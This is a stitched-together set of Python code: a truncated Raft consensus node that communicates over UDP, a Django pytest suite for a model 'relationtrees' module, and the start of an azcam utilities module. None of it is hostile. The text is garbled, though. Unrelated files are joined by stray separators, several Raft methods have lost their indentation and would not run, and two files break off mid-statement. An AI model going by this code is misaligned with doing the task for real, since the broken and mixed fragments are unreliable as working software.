# filtered out by the stdlib logging machinery.
logging.basicConfig(level=logging.WARN, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# 4 actions after receiving a message:
# 1. all_do(data): performed by every role
# 2. leader_do(data)
# 3. candidate_do(data)
# 4. follower_do(data)
class Node(object):
    def __init__(self, conf):
        """Initialise a raft node.

        conf is a dict with keys 'id' (also used as the on-disk state
        directory name), 'addr' (UDP bind address tuple) and 'peers'
        (mapping of peer id -> address tuple).
        """
        self.role = 'follower'
        self.id = conf['id']
        self.addr = conf['addr']
        self.peers = conf['peers']
        # persistent state (survives restarts via load()/save())
        self.current_term = 0
        self.voted_for = None
        if not os.path.exists(self.id):
            os.mkdir(self.id)
        # init persistent state from <id>/key.json (created on first run)
        self.load()
        self.log = Log(self.id)
        # volatile state
        # rule 1, 2
        self.commit_index = 0
        self.last_applied = 0
        # volatile state on leaders
        # rule 1, 2
        self.next_index = {_id: self.log.last_log_index + 1 for _id in self.peers}
        self.match_index = {_id: -1 for _id in self.peers}
        # append entries: id of the current leader, learned from heartbeats
        self.leader_id = None
        # request vote: per-peer vote tally for our own candidacy
        self.vote_ids = {_id: 0 for _id in self.peers}
        # client request: where to send the reply once an entry commits
        self.client_addr = None
        # tick: election timeout range in the project's time units
        self.wait_ms = (10, 20)
        self.next_leader_election_time = time.time() + random.randint(*self.wait_ms)
        self.next_heartbeat_time = 0
        # ss is the receiving socket (2s timeout so the main loop can tick)
        self.ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.ss.bind(self.addr)
        self.ss.settimeout(2)
        # cs is the sending socket; only used inside send(self, msg, addr)
        self.cs = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # lead_req_socket is used to accept lead election requests from other nodes.
        #lead_req_addr = (self.addr[0], 10002)
        #self.lead_req_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        #self.lead_req_socket.bind(lead_req_addr)
        # lead_res_socket is used to send respond to other nodes.
        #self.lead_res_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def load(self):
# 记载保存到本地的结果,如果没有(第一次运行服务器)就创建一个
# load值在init中被调用
file_path = self.id + '/key.json'
if os.path.exists(file_path):
with open(file_path, 'r') as f:
data = json.load(f)
self.current_term = data['current_term']
self.voted_for = data['voted_for']
else:
self.save()
def save(self):
data = {'current_term': self.current_term,
'voted_for': self.voted_for,
}
file_path = self.id + '/key.json'
with open(file_path, 'w') as f:
json.dump(data, f)
    def send(self, msg, addr):
        # Serialise `msg` (a dict) to JSON and fire it at `addr` over UDP
        # via the dedicated sending socket.
        msg = json.dumps(msg).encode('utf-8')
        self.cs.sendto(msg, addr)
    def recv(self):
        # (translated) Receive one datagram on self.ss; every message in the
        # protocol is a JSON-encoded dict.
        # recvfrom(65535): the maximum amount of data a single UDP datagram
        # can carry is 65535 bytes.
        msg, addr = self.ss.recvfrom(65535)
        return json.loads(msg), addr
def redirect(self, data, addr):
# 重定向,follower接收到来自client的要重定向给leader来处理。
if data == None:
return None
if data['type'] == 'client_append_entries':
if self.role != 'leader':
if self.leader_id:
logging.info('redirect: client_append_entries to leader')
self.send(data, self.peers[self.leader_id])
return None
else:
self.client_addr = addr
return data
if data['dst_id'] != self.id:
#logging.info('redirect: to ' + data['dst_id']) #Can Only concatenate str (not "tuple") to str.
# logging.info('redirec to leader')
self.send(data, self.peers[data['dst_id']])
return None
else:
return data
return data
    def append_entries(self, data):
        '''
        append entries rpc
        only used in follower state
        '''
        '''
        (translated) After a leader is elected it starts serving client
        requests.  On receiving one, the leader appends the request as a log
        entry to its own log and sends append_entries RPCs to the other
        servers.  A server that finds the request acceptable appends it to
        its local log and replies success.  Once the leader has success
        responses from a majority of servers, it formally commits the entry;
        committed entries have been accepted by the raft cluster and can be
        applied to the state machine.
        '''
        response = {'type': 'append_entries_response',
                    'src_id': self.id,
                    'dst_id': data['src_id'],
                    'term': self.current_term,
                    'success': False
                    }
        '''1
        (translated) Reject if the request does not meet the acceptance
        conditions (stale term).
        '''
        if data['term'] < self.current_term:
            logging.info('          2. smaller term')
            logging.info('          3. success = False: smaller term')
            logging.info('          4. send append_entries_response to leader ' + data['src_id'])
            response['success'] = False
            self.send(response, self.peers[data['src_id']])
            return
        # Term is current: accept the sender as our leader.
        self.leader_id = data['leader_id']
        # heartbeat (empty entries list): nothing to append
        if data['entries'] == []:
            logging.info('          4. heartbeat')
            return
        prev_log_index = data['prev_log_index']
        prev_log_term = data['prev_log_term']
        tmp_prev_log_term = self.log.get_log_term(prev_log_index)
        # append_entries: rule 2, 3
        # append_entries: rule 3 -- our log conflicts at prev_log_index, so
        # truncate from there and report failure (leader will back off).
        if tmp_prev_log_term != prev_log_term:
            logging.info('          4. success = False: index not match or term not match')
            logging.info('          5. send append_entries_response to leader ' + data['src_id'])
            logging.info('          6. log delete_entries')
            logging.info('          6. log save')
            response['success'] = False
            self.send(response, self.peers[data['src_id']])
            self.log.delete_entries(prev_log_index)
        # append_entries rule 4 -- logs agree up to prev_log_index: append.
        else:
            logging.info('          4. success = True')
            logging.info('          5. send append_entries_response to leader ' + data['src_id'])
            logging.info('          6. log append_entries')
            logging.info('          7. log save')
            response['success'] = True
            self.send(response, self.peers[data['src_id']])
            self.log.append_entries(prev_log_index, data['entries'])
            # append_entries rule 5 -- advance commit index, capped by the
            # last entry we actually hold.
            leader_commit = data['leader_commit']
            if leader_commit > self.commit_index:
                commit_index = min(leader_commit, self.log.last_log_index)
                self.commit_index = commit_index
                logging.info('          8. commit_index = ' + str(commit_index))
        return
def request_vote(self, data):
'''
request vote rpc
only used in follower state
'''
response = {'type': 'request_vote_response',
'src_id': self.id,
'dst_id': data['src_id'],
'term': self.current_term,
'vote_granted': False
}
# request vote: rule 1
if data['term'] < self.current_term:
logging.info(' 2. smaller term')
logging.info(' 3. success = False')
logging.info(' 4. send request_vote_response to candidate ' + data['src_id'])
response['vote_granted'] = False
self.send(response, self.peers[data['src_id']])
return
logging.info(' 2. same term')
candidate_id = data['candidate_id']
last_log_index = data['last_log_index']
last_log_term = data['last_log_term']
if self.voted_for == None or self.voted_for == candidate_id:
if last_log_index >= self.log.last_log_index and last_log_term >= self.log.last_log_term:
self.voted_for = data['src_id']
self.save()
response['vote_granted'] = True
self.send(response, self.peers[data['src_id']])
logging.info(' 3. success = True: candidate log is newer')
logging.info(' 4. send request_vote_response to candidate ' + data['src_id'])
else:
self.voted_for = None
self.save()
response['vote_granted'] = False
self.send(response, self.peers[data['src_id']])
logging.info(' 3. success = False: candidate log is older')
logging.info(' 4. send request_vote_response to candidate ' + data['src_id'])
else:
response['vote_granted'] = False
self.send(response, self.peers[data['src_id']])
logging.info(' 3. success = False: has vated for ' + self.voted_for)
logging.info(' 4. send request_vote_response to candidate ' + data['src_id'])
return
    def all_do(self, data):
        '''
        all servers: rule 1, 2

        Work every role performs on each tick: apply newly committed
        entries, step down on seeing a higher term, and answer
        'request_leader' queries from clients.
        '''
        logging.info('-------------------------------all------------------------------------------')
        if self.commit_index > self.last_applied:
            self.last_applied = self.commit_index
            logging.info('all: 1. last_applied = ' + str(self.last_applied))
        if data == None:
            return
        if data['type'] == 'client_append_entries':
            # Client messages carry no 'term'; role-specific handlers deal
            # with them.
            return
        # A higher term in any message forces a step-down to follower.
        if data['term'] > self.current_term:
            logging.info('all: 1. bigger term')
            logging.info('     2. become follower')
            self.role = 'follower'
            self.current_term = data['term']
            self.voted_for = None
            self.save()
        if data['type'] == 'request_leader':
            print("Client Asking who is leader")
            # NOTE(review): raises KeyError if leader_id is still None, and
            # assumes client_addr was recorded earlier -- confirm callers
            # guarantee both.
            res_data = {'ip': self.peers[self.leader_id]}
            self.send(res_data, self.client_addr)
        return
    def follower_do(self, data):
        '''
        rules for servers: follower

        React to leader heartbeats / log replication and candidate vote
        requests; convert to candidate when the election timer expires.
        '''
        logging.info('-------------------------------follower-------------------------------------')
        t = time.time()
        # follower rules: rule 1
        if data != None:
            if data['type'] == 'append_entries':
                logging.info('follower: 1. recv append_entries from leader ' + data['src_id'])
                if data['term'] == self.current_term:
                    logging.info('          2. same term')
                    logging.info('          3. reset next_leader_election_time')
                    # Valid leader contact: push the election deadline back.
                    self.next_leader_election_time = t + random.randint(*self.wait_ms)
                self.append_entries(data)
            elif data['type'] == 'request_vote':
                logging.info('follower: 1. recv request_vote from candidate ' + data['src_id'])
                self.request_vote(data)
        # follower rules: rule 2 -- election timeout elapsed without hearing
        # from a leader: start a new election as candidate.
        if t > self.next_leader_election_time:
            logging.info('follower:1. become candidate')
            self.next_leader_election_time = t + random.randint(*self.wait_ms)
            self.role = 'candidate'
            self.current_term += 1
            self.voted_for = self.id
            self.save()
            self.vote_ids = {_id: 0 for _id in self.peers}
        return
    def candidate_do(self, data):
        '''
        rules for fervers: candidate

        Solicit votes from peers that have not answered yet, tally
        responses, and convert to leader on a majority or back to follower
        on seeing a current leader.
        '''
        logging.info('-------------------------------candidate------------------------------------')
        t = time.time()
        # candidate rules: rule 1 -- (re)send request_vote to every peer
        # that has not granted us a vote yet.
        for dst_id in self.peers:
            if self.vote_ids[dst_id] == 0:
                logging.info('candidate: 1. send request_vote to peer ' + dst_id)
                request = {
                    'type': 'request_vote',
                    'src_id': self.id,
                    'dst_id': dst_id,
                    'term': self.current_term,
                    'candidate_id': self.id,
                    'last_log_index': self.log.last_log_index,
                    'last_log_term': self.log.last_log_term
                }
                # logging.info(request)
                self.send(request, self.peers[dst_id])
        # if data != None and data['term'] < self.current_term:
        #     logging.info('candidate: 1. smaller term from ' + data['src_id'])
        #     logging.info('           2. ignore')
        #     return
        if data != None and data['term'] == self.current_term:
            # candidate rules: rule 2 -- count votes; together with our own
            # vote, peer votes >= len(peers)//2 forms a cluster majority.
            if data['type'] == 'request_vote_response':
                logging.info('candidate: 1. recv request_vote_response from follower ' + data['src_id'])
                self.vote_ids[data['src_id']] = data['vote_granted']
                vote_count = sum(list(self.vote_ids.values()))
                if vote_count >= len(self.peers)//2:
                    logging.info('           2. become leader')
                    self.role = 'leader'
                    self.voted_for = None
                    self.save()
                    self.next_heartbeat_time = 0
                    self.next_index = {_id: self.log.last_log_index + 1 for _id in self.peers}
                    self.match_index = {_id: 0 for _id in self.peers}
                    return
            # candidate rules: rule 3 -- a valid leader emerged: step down.
            elif data['type'] == 'append_entries':
                logging.info('candidate: 1. recv append_entries from leader ' + data['src_id'])
                logging.info('           2. become follower')
                self.next_leader_election_time = t + random.randint(*self.wait_ms)
                self.role = 'follower'
                self.voted_for = None
                self.save()
                return
        # candidate rules: rule 4 -- election timed out: start a new one.
        if t > self.next_leader_election_time:
            logging.info('candidate: 1. leader_election timeout')
            logging.info('           2. become candidate')
            self.next_leader_election_time = t + random.randint(*self.wait_ms)
            self.role = 'candidate'
            self.current_term += 1
            self.voted_for = self.id
            self.save()
            self.vote_ids = {_id: 0 for _id in self.peers}
        return
def leader_do(self, data):
'''
rules for fervers: leader
'''
logging.info('-------------------------------leader---------------------------------------')
# leader rules: rule 1, 3
t = time.time()
if t > self.next_heartbeat_time:
self.next_heartbeat_time = t + random.randint(0, 5)
for dst_id in self.peers:
logging.info('leader:1. send append_entries to peer ' + dst_id)
request = {'type': 'append_entries',
'src_id': self.id,
'dst_id': dst_id,
'term': self.current_term,
'leader_id': self.id,
'prev_log_index': self.next_index[dst_id] - 1,
'prev_log_term': self.log.get_log_term(self.next_index[dst_id] - 1),
'entries': self.log.get_entries(self.next_index[dst_id]),
'leader_commit': self.commit_index
}
self.send(request, self.peers[dst_id])
# leader rules: rule 2
if data != None and data['type'] == 'client_append_entries':
data['term'] = self.current_term
self.log.append_entries(self.log.last_log_index, [data])
logging.info('leader:1. recv append_entries from client')
logging.info(' 2. log append_entries')
logging.info(' 3. log save')
return
# leader rules: rule 3.1, 3.2
if data != None and data['term'] == self.current_term:
if data['type'] == 'append_entries_response':
logging.info('leader:1. recv append_entries_response from follower ' + data['src_id'])
if data['success'] == False:
self.next_index[data['src_id']] -= 1
logging.info(' 2. success = False')
logging.info(' 3. next_index - 1')
else:
self.match_index[data['src_id']] = | |
# django/sierra/sierra/tests/test_relationtrees.py
"""
Tests the relationtrees module used in custom sierra management commands.
"""
import pytest
from testmodels import models as m
from sierra.management import relationtrees
# FIXTURES AND TEST DATA
pytestmark = pytest.mark.django_db
# (model, fieldname) pairs that must be rejected by Relation.__init__.
BAD_RELATION_PARAMS = {
    'Invalid model': ('invalid', 'fieldname'),
    'Invalid fieldname': (m.EndNode, 'invalid'),
    'Fieldname is not a relation': (m.EndNode, 'name'),
}
# Valid (model, fieldname) pairs covering every relation direction/kind.
RELATION_PARAMS = {
    'ReferenceNode to EndNode': (m.ReferenceNode, 'end'),
    'ReferenceNode to ThroughNode': (m.ReferenceNode, 'throughnode_set'),
    'ReferenceNode to ManyToManyNode': (m.ReferenceNode, 'm2m'),
    'ReferenceNode to SelfReferentialNode': (m.ReferenceNode, 'srn'),
    'ReferenceNode to OneToOneNode': (m.ReferenceNode, 'one'),
    'ThroughNode to ReferenceNode': (m.ThroughNode, 'ref'),
    'ThroughNode to ManyToManyNode': (m.ThroughNode, 'm2m'),
    'ManyToManyNode to ThroughNode': (m.ManyToManyNode, 'throughnode_set'),
    'ManyToManyNode to EndNode': (m.ManyToManyNode, 'end'),
    'ManyToManyNode to ReferenceNode':
        (m.ManyToManyNode, 'referencenode_set'),
    'EndNode to ReferenceNode': (m.EndNode, 'referencenode_set'),
    'EndNode to ManyToManyNode': (m.EndNode, 'manytomanynode_set'),
    'EndNode to SelfReferentialNode':
        (m.EndNode, 'selfreferentialnode_set'),
    'OneToOneNode to ReferenceNode': (m.OneToOneNode, 'referencenode'),
    'SelfReferentialNode to SelfReferentialNode':
        (m.SelfReferentialNode, 'parent'),
    'SelfReferentialNode to ReferenceNode':
        (m.SelfReferentialNode, 'referencenode_set'),
    'SelfReferentialNode to EndNode': (m.SelfReferentialNode, 'end'),
}
# (root model, fieldname chain) inputs for building RelationBranch objects.
BRANCH_PARAMS = {
    'ReferenceNode > end': (m.ReferenceNode, ['end']),
    'ReferenceNode > one': (m.ReferenceNode, ['one']),
    'ReferenceNode > m2m, end': (m.ReferenceNode, ['m2m', 'end']),
    'ReferenceNode > throughnode_set, m2m, end':
        (m.ReferenceNode, ['throughnode_set', 'm2m', 'end']),
    'ReferenceNode > srn, parent, end':
        (m.ReferenceNode, ['srn', 'parent', 'end']),
    'ThroughNode > ref, one': (m.ThroughNode, ['ref', 'one']),
    'ThroughNode > m2m, referencenode_set, end':
        (m.ThroughNode, ['m2m', 'referencenode_set', 'end']),
    'SelfReferentialNode > referencenode_set, m2m, end':
        (m.SelfReferentialNode, ['referencenode_set', 'm2m', 'end']),
    'ThroughNode > ref, m2m, end': (m.ThroughNode, ['ref', 'm2m', 'end']),
    'EndNode > m2m, ref, end':
        (m.EndNode, ['manytomanynode_set', 'referencenode_set', 'end']),
    'OneToOneNode > referencenode, m2m, end':
        (m.OneToOneNode, ['referencenode', 'm2m', 'end']),
}
# (root model, list of fieldname chains) inputs for RelationTree objects.
TREE_PARAMS = {
    'No branches (EndNode)':
        (m.EndNode, []),
    'Has branches (SelfReferentialNode)':
        (m.SelfReferentialNode, [
            ['referencenode_set', 'one'],
            ['referencenode_set', 'end'],
            ['referencenode_set', 'srn', 'end'],
            ['referencenode_set', 'srn', 'parent', 'end']
        ])
}
@pytest.fixture
def instname_to_model():
    """Fixture: map a test-instance name (e.g. 'ref0') to its model class."""
    prefix_to_model = {
        'ref': m.ReferenceNode,
        'srn': m.SelfReferentialNode,
        'end': m.EndNode,
        'm2m': m.ManyToManyNode,
        'thr': m.ThroughNode,
        'one': m.OneToOneNode,
    }
    def do_it(inst_name):
        # The first three characters of an instance name encode its model.
        return prefix_to_model[inst_name[:3]]
    return do_it
@pytest.fixture
def get_model_instances(instname_to_model):
    """Fixture: fetch model instances by name, ordered by name."""
    def do_it(inst_names):
        if not isinstance(inst_names, (list, tuple)):
            inst_names = [inst_names]
        if not inst_names:
            # Nothing requested, nothing to query.
            return []
        model = instname_to_model(inst_names[0])
        return model.objects.filter(name__in=inst_names).order_by('name')
    return do_it
@pytest.fixture
def assert_all_objset_calls():
    """Fixture: assert a mock saw exactly the expected object sets.

    Scans every positional/keyword argument of every recorded call for
    model-object iterables (detected via `arg[0]._meta`) and checks that,
    order-insensitively, they match `exp_objsets` one-for-one.
    """
    def do_it(mock, exp_objsets):
        calls = mock.call_args_list
        actual_objsets = []
        for call in calls:
            # BUG FIX: wrap call[1].values() in list() -- on Python 3 it is
            # a dict view and cannot be concatenated to a list directly.
            for arg in (list(call[0]) + list(call[1].values())):
                try:
                    arg[0]._meta
                except Exception:
                    # Not a model-object sequence; ignore.
                    pass
                else:
                    actual_objsets += [sorted([obj for obj in arg],
                                              key=lambda x: x.name)]
        for exp_objset in exp_objsets:
            expected = [obj for obj in exp_objset]
            assert expected in actual_objsets
            actual_objsets.remove(expected)
        # Every recorded object set must have been accounted for.
        assert actual_objsets == []
    return do_it
@pytest.fixture(params=[key for key in BAD_RELATION_PARAMS.keys()])
def make_bad_relation(request):
    """Fixture: zero-arg thunk that builds an invalid Relation when called."""
    params = BAD_RELATION_PARAMS[request.param]
    return lambda: relationtrees.Relation(*params)
@pytest.fixture(params=[key for key in RELATION_PARAMS.keys()])
def relation(request):
    # Parametrized over every valid (model, fieldname) pair above.
    return relationtrees.Relation(*RELATION_PARAMS[request.param])
@pytest.fixture(scope='module')
def make_branch():
    # Factory: build a RelationBranch from a root model and fieldname chain.
    def do_it(model, fnames):
        rels = relationtrees.make_relation_chain_from_fieldnames(model, fnames)
        return relationtrees.RelationBranch(model, rels)
    return do_it
@pytest.fixture(params=[key for key in BRANCH_PARAMS.keys()])
def branch(make_branch, request):
    # Parametrized over every fieldname chain in BRANCH_PARAMS.
    return make_branch(*BRANCH_PARAMS[request.param])
@pytest.fixture(scope='module')
def make_tree(make_branch):
    # Factory: build a RelationTree from a root model and chains of fieldnames.
    def do_it(model, flists):
        branches = [make_branch(model, fl) for fl in flists]
        return relationtrees.RelationTree(model, branches)
    return do_it
@pytest.fixture(params=[key for key in TREE_PARAMS.keys()])
def tree(make_tree, request):
    # Parametrized over every tree description in TREE_PARAMS.
    return make_tree(*TREE_PARAMS[request.param])
@pytest.fixture
def all_trees(make_tree):
    """Fixture: build every tree from TREE_PARAMS, keyed by its label.

    Uses .items() instead of the Python-2-only .iteritems() so the fixture
    also works under Python 3 (.items() is valid on both).
    """
    return {k: make_tree(*v) for k, v in TREE_PARAMS.items()}
# TESTS
@pytest.mark.bucket
@pytest.mark.parametrize('oldcmps, newcmps', [
    ([], [m.ReferenceNode, m.EndNode]),
    ([m.ReferenceNode], [m.ReferenceNode, m.EndNode]),
    ([m.ReferenceNode, m.EndNode], [m.ReferenceNode, m.EndNode]),
    ([m.EndNode, m.ReferenceNode], [m.ReferenceNode, m.EndNode]),
    ([m.ReferenceNode, m.SelfReferentialNode], [m.ReferenceNode, m.EndNode])
], ids=[
    'empty bucket',
    'one existing compartment, in new compartments',
    'old compartments == new compartments',
    'old compartments in different order than new compartments',
    'one old compartment missing from new compartments'
])
def test_bucket_updatecompartments_updates_correctly(oldcmps, newcmps):
    """
    Bucket.update_compartments should correctly update the
    `compartments` attribute of the bucket AND should ensure dict
    elements for the new compartments exist on the bucket.
    """
    bkt = relationtrees.Bucket(oldcmps)
    bkt.update_compartments(newcmps)
    assert bkt.compartments == newcmps
    assert all(cmp in bkt for cmp in newcmps)
@pytest.mark.bucket
def test_bucket_updatecompartments_doesnt_change_data(get_model_instances):
    """
    Bucket.update_compartments should not change any existing data.
    """
    bkt = relationtrees.Bucket([m.ReferenceNode])
    stored = get_model_instances('ref0')[0]
    bkt.put(stored)
    bkt.update_compartments([m.EndNode, m.ReferenceNode])
    refs = bkt[m.ReferenceNode]
    assert len(refs) == 1
    assert refs[stored.pk] == stored
@pytest.mark.bucket
@pytest.mark.parametrize('oldcmps, objlists, newcmps', [
    ([m.ReferenceNode], [['ref0']], [m.ReferenceNode]),
    ([m.ReferenceNode], [['ref0', 'ref2']], [m.ReferenceNode]),
    ([m.ReferenceNode, m.EndNode], [['ref0', 'ref1'], ['end0']],
     [m.ReferenceNode, m.EndNode]),
    ([], [['ref0']], [m.ReferenceNode]),
    ([], [['ref0', 'ref0'], ['ref0']], [m.ReferenceNode]),
], ids=[
    'single object',
    'multiple objects, same type',
    'multiple objects, different types',
    'object without an existing compartment',
    'duplicate objects'
])
def test_bucket_put_puts_objs_into_compartments(oldcmps, objlists, newcmps,
                                                get_model_instances,
                                                instname_to_model):
    """
    Bucket.put should put objects into the correct compartments using
    the correct keys; objects should be deduplicated, and compartments
    should be added if they don't already exist.
    """
    bucket = relationtrees.Bucket(oldcmps)
    # One put() per objlist, mirroring how callers batch by model type.
    for objlist in objlists:
        bucket.put(get_model_instances(objlist))
    assert bucket.compartments == newcmps
    for exp_names in objlists:
        model = instname_to_model(exp_names[0])
        # Duplicates in the input must collapse to one stored object each.
        unique_expnames = list(set(exp_names))
        actual_names = [obj.name for obj in bucket[model].values()]
        assert len(bucket[model]) == len(unique_expnames)
        assert all([name in actual_names for name in unique_expnames])
@pytest.mark.bucket
def test_bucket_dump_returns_objs_in_compartment_order(get_model_instances):
    """
    Bucket.dump should return a list of objects that have been "put"
    into the bucket in compartment and then PK order.
    """
    bucket = relationtrees.Bucket([m.EndNode, m.ReferenceNode])
    bucket.put(get_model_instances(['ref2', 'ref0']))
    bucket.put(get_model_instances(['end0', 'end1', 'end2']))
    # EndNode compartment comes first, each compartment in PK order
    expected = []
    expected.extend(get_model_instances(['end0', 'end1', 'end2']))
    expected.extend(get_model_instances(['ref0', 'ref2']))
    assert bucket.dump() == expected
@pytest.mark.relation
def test_relation_init_raises_error_on_invalid_data(make_bad_relation):
    """
    Relation.__init__ should raise a BadRelation error if the provided
    model/fieldname combo is not valid.
    """
    pytest.raises(relationtrees.BadRelation, make_bad_relation)
@pytest.mark.relation
@pytest.mark.parametrize('relation, m2m, multi, direct', [
    ('ReferenceNode to OneToOneNode', False, False, True),
    ('ReferenceNode to EndNode', False, False, True),
    ('ReferenceNode to ManyToManyNode', True, True, True),
    ('OneToOneNode to ReferenceNode', False, False, False),
    ('EndNode to ReferenceNode', False, True, False),
    ('ManyToManyNode to ReferenceNode', True, True, False)
], ids=[
    'direct 1-1',
    'direct foreign-key',
    'direct m2m',
    'indirect 1-1',
    'indirect 1-many',
    'indirect m2m',
], indirect=['relation'])
def test_relation_isattrs_return_right_bools(relation, m2m, multi, direct):
    """
    All "is" attributes on Relation objects should return the correct
    truth values for the type of relation that is represented.
    """
    actual = (relation.is_m2m, relation.is_multi, relation.is_direct)
    assert actual == (m2m, multi, direct)
@pytest.mark.relation
@pytest.mark.parametrize('relation, target', [
    ('ReferenceNode to OneToOneNode', m.OneToOneNode),
    ('ReferenceNode to SelfReferentialNode', m.SelfReferentialNode),
    ('ReferenceNode to ManyToManyNode', m.ManyToManyNode),
    ('OneToOneNode to ReferenceNode', m.ReferenceNode),
    ('EndNode to ReferenceNode', m.ReferenceNode),
    ('ManyToManyNode to ReferenceNode', m.ReferenceNode)
], ids=[
    'direct 1-1',
    'direct foreign-key',
    'direct m2m',
    'indirect 1-1',
    'indirect 1-many',
    'indirect m2m',
], indirect=['relation'])
def test_relation_targetmodel_has_right_model(relation, target):
    """
    Relation.target_model should contain whatever model is on the other
    end of the relation relative to Relation.model.
    """
    actual = relation.target_model
    assert actual == target
@pytest.mark.relation
@pytest.mark.parametrize('relation, exp', [
    ('ReferenceNode to ManyToManyNode',
     ['ReferenceNode to ThroughNode', 'ThroughNode to ManyToManyNode']),
    ('ManyToManyNode to ReferenceNode',
     ['ManyToManyNode to ThroughNode', 'ThroughNode to ReferenceNode'])
], ids=[
    'direct m2m',
    'indirect m2m'
], indirect=['relation'])
def test_relation_getasthroughrelations_m2m_returns_expected(relation, exp):
    """
    Relation.get_as_through_relations should return the expected list
    of Relation objects, if the relationship is many-to-many.
    """
    def params(rel):
        # Compare relations by their defining triple, not object identity.
        return [rel.model, rel.fieldname, rel.target_model]

    expected = [params(relationtrees.Relation(*RELATION_PARAMS[name]))
                for name in exp]
    actual = [params(rel) for rel in relation.get_as_through_relations()]
    assert actual == expected
@pytest.mark.relation
@pytest.mark.parametrize('relation', [
    'ReferenceNode to OneToOneNode',
    'ReferenceNode to SelfReferentialNode',
    'OneToOneNode to ReferenceNode',
    'EndNode to ReferenceNode'
], ids=[
    'direct 1-1',
    'direct foreign-key',
    'indirect 1-1',
    'indirect 1-many'
], indirect=['relation'])
def test_relation_getasthroughrelations_not_m2m_returns_error(relation):
    """
    Relation.get_as_through_relations should raise a BadRelation error
    if the relation is not an m2m relation.
    """
    pytest.raises(relationtrees.BadRelation,
                  relation.get_as_through_relations)
@pytest.mark.relation
@pytest.mark.parametrize('relation, models, result', [
    ('ReferenceNode to OneToOneNode', None,
     [m.OneToOneNode, m.ReferenceNode]),
    ('OneToOneNode to ReferenceNode', None,
     [m.OneToOneNode, m.ReferenceNode]),
    ('ReferenceNode to SelfReferentialNode', None,
     [m.SelfReferentialNode, m.ReferenceNode]),
    ('SelfReferentialNode to ReferenceNode', None,
     [m.SelfReferentialNode, m.ReferenceNode]),
    ('ReferenceNode to ManyToManyNode', None,
     [m.ManyToManyNode, m.ReferenceNode]),
    ('ManyToManyNode to ReferenceNode', None,
     [m.ManyToManyNode, m.ReferenceNode]),
    ('ReferenceNode to SelfReferentialNode', [],
     [m.SelfReferentialNode, m.ReferenceNode]),
    ('ReferenceNode to SelfReferentialNode',
     [m.SelfReferentialNode],
     [m.SelfReferentialNode, m.ReferenceNode]),
    ('ReferenceNode to SelfReferentialNode',
     [m.ReferenceNode],
     [m.SelfReferentialNode, m.ReferenceNode]),
    ('ReferenceNode to SelfReferentialNode',
     [m.ReferenceNode, m.SelfReferentialNode],
     [m.SelfReferentialNode, m.ReferenceNode]),
    ('ReferenceNode to SelfReferentialNode',
     [m.SelfReferentialNode, m.ReferenceNode],
     [m.SelfReferentialNode, m.ReferenceNode]),
    ('ReferenceNode to SelfReferentialNode',
     [m.EndNode, m.ReferenceNode, m.SelfReferentialNode],
     [m.EndNode, m.SelfReferentialNode, m.ReferenceNode]),
    ('ReferenceNode to SelfReferentialNode',
     [m.ReferenceNode, m.EndNode, m.SelfReferentialNode],
     [m.SelfReferentialNode, m.ReferenceNode, m.EndNode]),
    ('ReferenceNode to SelfReferentialNode',
     [m.ReferenceNode, m.SelfReferentialNode, m.EndNode],
     [m.SelfReferentialNode, m.ReferenceNode, m.EndNode]),
], ids=[
    'direct 1-1; second (indirect) should be first',
    'indirect 1-1; first (indirect) should be first',
    'direct fk, 1-many; second (many) should be first',
    'indirect many-1; first (many) should be first',
    'direct m2m; second should be first',
    'indirect m2m; first should be first',
    'models list is empty',
    'first model is in models list and second is not',
    'second model is in models list and first is not',
    'both models (only) are in models list, out of order',
    'both models (only) are in models list, in order',
    'multiple models, non-relevant model is before first and second',
    'multiple models, non-relevant model is between first and second',
    'multiple models, non-relevant model is after first and second',
],
indirect=['relation'])
def test_relation_arrangemodels_order(relation, models, result):
    """
    Relation.arrange_models should return models in dependency order,
    optionally utilizing a supplied "models" list.
    """
    arranged = relation.arrange_models(models)
    assert arranged == result
@pytest.mark.relation
@pytest.mark.parametrize('relation, source, result', [
('ReferenceNode to EndNode', [], []),
('ReferenceNode to OneToOneNode', ['ref2'], []),
('OneToOneNode to ReferenceNode', ['one2'], []),
('SelfReferentialNode to EndNode', ['srn1'], []),
('EndNode to ReferenceNode', ['end1'], []),
('ReferenceNode to OneToOneNode', ['ref0'], ['one0']),
('OneToOneNode to ReferenceNode', ['one1'], ['ref1']),
('ReferenceNode to EndNode', ['ref0'], ['end0']),
('ReferenceNode to EndNode', ['ref0', 'ref1'], ['end0', 'end2']),
('EndNode to ReferenceNode', ['end0'], ['ref0']),
('EndNode to | |
"""
*azcam.utils* contains general purpose support commands used throughout azcam.
"""
import os
import shlex
import sys
import tkinter
import tkinter.filedialog
# keyboard checking is optional
try:
import msvcrt
except Exception:
pass
import azcam
def curdir(folder: str = "") -> str:
    """
    Gets and sets the working folder.

    If folder is not specified then just return the current working folder.

    Args:
        folder: name of folder to set as current.
    Returns:
        the current folder (after changing), using forward slashes.
    """
    if folder is None:
        return

    if folder != "":
        # tolerate folder names pasted with surrounding double quotes
        folder = folder.lstrip('"').rstrip('"')

    try:
        os.chdir(folder)
    except FileNotFoundError:
        # leave the working folder unchanged if the target does not exist
        pass

    wd = os.getcwd().replace("\\", "/")
    azcam.db.wd = wd  # save result
    return wd
def fix_path(path: str = "", no_drive_letter: bool = True) -> str:
    """
    Makes a nice absolute path, leaving only forward slashes.

    Args:
        path: name of path to clean up.
        no_drive_letter: if true, remove a leading Windows drive letter
            (e.g. "C:") so results are OS-agnostic.
    Returns:
        cleaned path name.
    """
    clean = os.path.abspath(os.path.normpath(path)).replace("\\", "/")
    # strip a leading drive letter like "C:" when requested
    if no_drive_letter and len(clean) > 2 and clean[1] == ":":
        clean = clean[2:]
    return clean
def add_searchfolder(search_folder: str = "", include_subfolders: bool = True) -> None:
    """
    Appends search_folder (and by default all its subfolders) to the current
    python search path.

    Default is current folder and its subfolders.
    Subfolders beginning with "_" are not included.

    Args:
        search_folder: Name of folder to add to sys.path
        include_subfolders: True to include all subfolders in sys.path
    """
    if search_folder == "":
        search_folder = curdir()
    search_folder = azcam.utils.fix_path(search_folder)

    if search_folder not in sys.path:
        sys.path.append(search_folder)

    # walk the tree and append every (non-underscore) subfolder once
    if include_subfolders:
        for root, dirs, _ in os.walk(search_folder):
            for name in dirs:
                if name.startswith("_"):
                    continue
